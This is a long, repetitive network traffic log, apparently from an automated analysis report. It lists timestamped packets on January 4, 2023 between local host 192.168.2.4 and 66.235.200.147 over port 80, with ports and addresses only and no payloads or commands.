Jan 4, 2023 16:47:45.461971045 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.461997986 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.462007046 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.462033987 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.462039948 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.462069035 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.462076902 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.462105036 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.462110996 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.462146044 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.462146044 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.462189913 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.462192059 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.462227106 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.462234974 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.462261915 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.462268114 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.462296963 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.462308884 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.462331057 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.462340117 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.462366104 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.462371111 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.462399006 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.462409019 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.462435007 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.462439060 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.462470055 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.462479115 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.462503910 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.462511063 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.462538958 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.462544918 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.462574005 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.462584972 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.462609053 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.462615967 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.462644100 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.462654114 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.462687016 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.462728024 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.462747097 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.462774992 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.462793112 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.462799072 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.462845087 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.462852001 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.462896109 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.462898970 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.462938070 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.462941885 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.462980986 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.462985039 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.463016033 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.463022947 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.463054895 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.463057041 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.463102102 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.463104963 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.463146925 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.463149071 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.463191032 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.463191986 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.463227034 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.463233948 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.463264942 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.463268042 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.463310003 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.463314056 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.463351965 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.463357925 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.463397026 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.463397980 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.463434935 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.463438988 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.463469982 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.463475943 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.463514090 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.463525057 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.463573933 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.463574886 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.463618994 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.463624001 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.463668108 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.463675976 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.463721037 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.463721037 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.463741064 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.463769913 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.463790894 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.463790894 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.463835001 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.463841915 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.463881969 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.463886023 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.463924885 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.463933945 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.463979006 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.463979006 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.464020014 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.464023113 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.464059114 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.464061975 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.464101076 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.464107990 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.464154959 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.464179039 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.464190960 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.464201927 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.464231968 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.464241028 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.464287043 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.464297056 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.464327097 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.464330912 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.464371920 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.464382887 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.464427948 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.464437962 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.464462996 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.464473009 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.464497089 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.464504004 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.464533091 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.464539051 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.464569092 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.464592934 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.464622974 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.464627981 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.464663982 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.464694977 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.464696884 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.464695930 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.464723110 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.464741945 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.464750051 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.464776993 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.464786053 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.464816093 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.464835882 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.464852095 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.464860916 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.464886904 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.464896917 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.464925051 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.464930058 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.464968920 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.464971066 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.465013981 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.465015888 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.465054989 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.465059042 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.465096951 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.465099096 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.465140104 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.465142012 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.465177059 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.465182066 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.465219021 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.465223074 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.465265036 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.465266943 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.465290070 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.465307951 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.465334892 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.465339899 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.465377092 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.465384007 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.465419054 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.465423107 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.465460062 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.465466976 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.465495110 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.465502977 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.465531111 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.465534925 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.465565920 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.465573072 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.465600967 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.465614080 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.465645075 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.465646029 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.465691090 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.465696096 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.465744019 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.465745926 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.465790987 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.465795040 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.465847015 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.465850115 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.465895891 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.465913057 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.465961933 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.467192888 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.467217922 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.467242002 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.467266083 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.467288017 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.467310905 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.467314959 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.467331886 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.467351913 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.467365026 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.467371941 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.467391968 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.467396021 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.467411995 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.467422009 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.467432022 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.467452049 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.467454910 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.467473030 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.467489958 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.467492104 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.467513084 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.467514038 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.467531919 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.467545033 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.467551947 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.467567921 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.467571974 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.467592955 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.467600107 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.467612982 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.467632055 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.467637062 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.467652082 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.467664957 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.467672110 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.467690945 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.467696905 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.467710972 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.467730999 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.467735052 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.467751026 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.467760086 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.467771053 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.467789888 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.467793941 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.467811108 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.467830896 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.467829943 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.467850924 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.467852116 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.467870951 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.467881918 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.467890024 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.467905045 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.467911005 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.467926979 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.467931986 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.467952013 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.467957973 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.467972040 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.467991114 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.468023062 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.468063116 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.468107939 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.469779015 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.469816923 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.469841957 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.469851017 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.469866037 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.469881058 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.469887972 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.469904900 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.469913960 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.469937086 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.469939947 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.469957113 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.469970942 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.469974995 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.470000982 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.470032930 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.470065117 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.470108032 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.470176935 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.470221996 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.470258951 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.470288038 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.470303059 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.470315933 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.470323086 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.470344067 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.470357895 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.470386028 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.470422983 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.470452070 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.470468998 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.470478058 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.470489025 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.470504999 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.470511913 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.470535040 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.470547915 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.470562935 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.470577002 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.470613956 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.472129107 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.472172976 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.472197056 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.472215891 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.472234011 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.472251892 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.472271919 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.472290993 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.472310066 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.472311974 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.472335100 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.472335100 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.472368002 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.472390890 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.472467899 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.472487926 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.472507954 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.472515106 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.472527981 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.472537041 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.472547054 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.472564936 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.472567081 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.472588062 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.472598076 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.472606897 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.472625971 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.472630978 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.472646952 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.472665071 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.472666025 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.472687006 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.472688913 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.472707033 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.472721100 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.472727060 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.472743988 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.472748041 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.472769022 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.472774982 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.472789049 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.472810030 CET	80	49696	66.235.200.147	192.168.2.4
